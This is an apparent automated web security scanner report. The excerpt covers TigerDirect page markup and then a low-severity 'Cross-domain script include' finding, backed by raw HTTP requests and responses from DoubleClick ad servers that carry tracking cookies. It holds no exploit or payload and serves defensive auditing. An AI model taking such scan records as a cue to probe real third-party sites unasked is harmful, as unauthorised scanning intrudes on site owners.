...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558909&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40513_main_image001_im.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558909,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=3948472&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/ULT40289_main_image001_im.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(3948472,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=4558928&amp;csid=_25"><img src="http://images.highspeedbackbone.net/skuimages/small/U12-40521-Main-sp.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(4558928,1,'_25');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=6764253&sku=B56-1006&amp;cm_sp=Footer-_-Spot%2001-_-CatId__B56-1006"><img src="http://images.highspeedbackbone.net/dealday/footer_B56-1006.jpg" alt="H&R Block At Home <BR>Deluxe 10 Software" border="0" title="H&R Block At Home Deluxe 10 Software- Personalized Tax Guidance With Advanced Tools"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=6764253&sku=B56-1006&amp;cm_sp=Footer-_-Spot%2001-_-CatId__B56-1006" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=2795126&sku=TSD-500AAKS&amp;cm_sp=Footer-_-Spot%2002-_-CatId_8_TSD-500AAKS"><img src="http://images.highspeedbackbone.net/dealday/footer_TSD-500AAKS.jpg" alt="Western Digital Caviar Blue 500GB Hard Drive" border="0" title="Western Digital WD5000AAKS Caviar Blue Hard Drive - 500GB, 7200rpm, 16MB, SATA-300, OEM"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=2795126&sku=TSD-500AAKS&amp;cm_sp=Footer-_-Spot%2002-_-CatId_8_TSD-500AAKS" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=5650958&sku=D700-5052&amp;cm_sp=Footer-_-Spot%2003-_-CatId_35_D700-5052"><img src="http://images.highspeedbackbone.net/dealday/footer_D700-5052.jpg" alt="D-Link Wireless-N 150 Home Router" border="0" title="D-Link DIR-601 Wireless-N 150 Home Router - IEEE 802.11n, 4x 10/100 LAN Ports, 10/100 WAN Port, External Antenna"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=5650958&sku=D700-5052&amp;cm_sp=Footer-_-Spot%2003-_-CatId_35_D700-5052" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4662424&sku=D29-1026&amp;cm_sp=Footer-_-Spot%2004-_-CatId_379_D29-1026"><img src="http://images.highspeedbackbone.net/dealday/footer_D29-1026.jpg" alt="Dane-Elec 8GB Capless <br>USB Flash Drive" border="0" title="Dane-Elec DA-ZMP-08G-CA-N4-R Capless USB Flash Drive - 8GB"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4662424&sku=D29-1026&amp;cm_sp=Footer-_-Spot%2004-_-CatId_379_D29-1026" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=18657&sku=H450-8216&amp;cm_sp=Footer-_-Spot%2005-_-CatId_136_H450-8216"><img src="http://images.highspeedbackbone.net/dealday/footer_H450-8216.jpg" alt="Hitachi 250GB Mobile Hard Drive" border="0" title="Hitachi 0S02528 Mobile External Hard Drive - 250GB, USB 2.0, Black"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=18657&sku=H450-8216&amp;cm_sp=Footer-_-Spot%2005-_-CatId_136_H450-8216" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="javascript:loadPage('browser', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/favorites2.gif" alt="Add to Favorites"></a>
               <a href="javascript:loadPage('del.icio.us', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/delicious.gif" alt="Add to del.icio.us"></a>
               <a href="javascript:loadPage('digg', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/digg.gif" alt="Add to Digg"></a>
               <a href="javascript:loadPage('reddit', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/reddit.gif" alt="Add to Reddit"></a>
               <a href="javascript:loadPage('furl', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/furl.gif" alt="Add to Furl"></a>
               <a href="javascript:loadPage('stumbleupon', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/su.gif" alt="Add to StumbleUpon"></a>
               <a href="javascript:loadPage('facebook', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/facebook.gif" alt="Add to Facebook"></a>
               <a href="javascript:loadPage('technorati', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/technorati.gif" alt="Add to Technorati"></a>
               <a href="javascript:loadPage('google', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/google.gif" alt="Add to Google"></a>
               <a href="javascript:loadPage('netscape', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/netscape.gif" alt="Add to Netscape"></a>
               <a href="javascript:loadPage('spurl', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/spurl.gif" alt="Add to Spurl"></a>
               <a href="javascript:loadPage('slashdot', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/slashdot.gif" alt="Add to Slashdot"></a>
...[SNIP]...
<div style="width:187px; height:44px; float:left; text-align:left; background:url(http://images.highspeedbackbone.net/footerus/social/footer_social_tiger_twitter2.jpg) top left no-repeat;"><a href="http://www.twitter.com/tigerdirect" target="_blank" style="width:155px; height:44px; display:block;"></a>
...[SNIP]...
<div style="width:187px; height:44px; float:left; text-align:left; background:url(http://images.highspeedbackbone.net/footerus/social/footer_social_tiger_facebook2.jpg) top left no-repeat;"><a href="http://www.facebook.com/tigerdirect" target="_blank" style="width:155px; height:44px; display:block;"></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/showme.asp" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/phone.gif" style="float: left; padding-right: 2px;"></a>
...[SNIP]...
<br /><a href="http://tigerdirect.iapplicants.com" target="_blank">Employment</a>
...[SNIP]...
<a href="http://www.tigerdirect.com/rss/index.asp">Deal Alerts via <img src="http://images.highspeedbackbone.net/main/icon_rss.gif" border="0"></a>
...[SNIP]...
<a href="http://www.tigerdirect.com"><img src="http://images.highspeedbackbone.net/footer/country_icons_18.gif" alt="TigerDirect.com" width="34" height="27" border="0" /></a><a href="http://www.tigerdirect.ca"><img src="http://images.highspeedbackbone.net/footer/country_icons_19.gif" alt="TigerDirect Canada" width="33" height="27" border="0" /></a><a href="http://www.misco.co.uk"><img src="http://images.highspeedbackbone.net/footer/country_icons_20.gif" alt="Misco UK" width="34" height="27" border="0" /></a><a href="http://www.misco.ie"><img src="http://images.highspeedbackbone.net/footer/country_icons_21.gif" alt="Ireland Misco" width="36" height="27" border="0" /></a><a href="http://www.misco.de"><img src="http://images.highspeedbackbone.net/footer/country_icons_22.gif" alt="Misco Germany Inc." width="35" height="27" border="0" /></a><a href="http://www.misco.at"><img src="http://images.highspeedbackbone.net/footer/country_icons_23.gif" alt="Misco Austria " width="33" height="27" border="0" /></a><a href="http://www.misco.ch"><img src="http://images.highspeedbackbone.net/footer/country_icons_24.gif" alt="Misco Switzerland" width="35" height="27" border="0" /></a><a href="http://www.misco.it"><img src="http://images.highspeedbackbone.net/footer/country_icons_25.gif" alt="Misco Italy Computers Suppliers S.p.A" width="32" height="27" border="0" /></a><a href="http://www.misco.fr"><img src="http://images.highspeedbackbone.net/footer/country_icons_26.gif" alt="Misco France" width="33" height="27" border="0" /></a><a href="http://www.misco.be"><img src="http://images.highspeedbackbone.net/footer/country_icons_27.gif" alt="Misco Belgium" width="35" height="27" border="0" /></a><a href="http://www.misco.nl"><img src="http://images.highspeedbackbone.net/footer/country_icons_28.jpg" alt="Misco Nederland BV" width="34" height="27" border="0" /></a><a href="http://www.misco.se"><img src="http://images.highspeedbackbone.net/footer/country_icons_29.gif" alt="Misco AB - Sweden" 
width="36" height="27" border="0" /></a><a href="http://www.misco.es"><img src="http://images.highspeedbackbone.net/footer/country_icons_30.gif" alt="Misco Iberia Computer Supplier SA - Madrid, Spain" width="35" height="27" border="0" /></a><a href="http://www.misco.pt"><img src="http://images.highspeedbackbone.net/footer/country_icons_31.gif" alt="Misco Iberia Computer Supplier SA - Madrid, Spain" width="36" height="27" border="0" /></a>
...[SNIP]...
<br /><a href="http://www.systemax.com/" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/systemax.jpg" alt="Systemax" Title="Systemax"></a>
                   <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TIGERDIRECT.COM&lang=en" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/verisign.gif" alt="VeriSign Secured" Title="VeriSign Secured"></a>

<a href="http://www.seflorida.bbb.org/BusinessReport.aspx?CompanyID=27000500&source=ctc" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/clickratingsm.gif" WIDTH="135" HEIGHT="52" BORDER="0"></a>

<a href="https://sealserver.trustkeeper.net/compliance/cert.php?code=ea97a8b6d8d755f41b78d04aa242d7f1&style=normal&size=105x54&language=en" target="hATW"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/trustwave_logo.gif" border="0" alt="Trusted Commerce" Title="Trusted Commerce"/></a>
                   <a href="http://www.bizrateinsights.com/2010-coe" target="_blank"><img src="http://images.highspeedbackbone.net/footer/BR_2010.gif" alt="Bizrate" title="Bizrate" /></a>
<img src="http://images.highspeedbackbone.net/footer/paypal_logo.gif" alt="PayPal" title="Shop Using PayPal" />
</div>
...[SNIP]...
</Script>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23. Cross-domain script include
There are 662 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


23.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) - In Page -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

23.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

23.3. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5875
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:44 GMT
Expires: Sun, 30 Jan 2011 17:24:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
//t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=39992639&randnum=4563724" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

23.4. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:27:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
//t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

23.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5877
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
//t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=6553387" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

23.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5219
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:45 GMT
Expires: Sun, 30 Jan 2011 17:24:45 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=4564506&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

23.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:29:44 GMT
Expires: Sun, 30 Jan 2011 01:29:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=5982434&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

23.8. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6382
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:18 GMT
Expires: Sun, 30 Jan 2011 19:26:18 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Dec 22 18:48:14 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

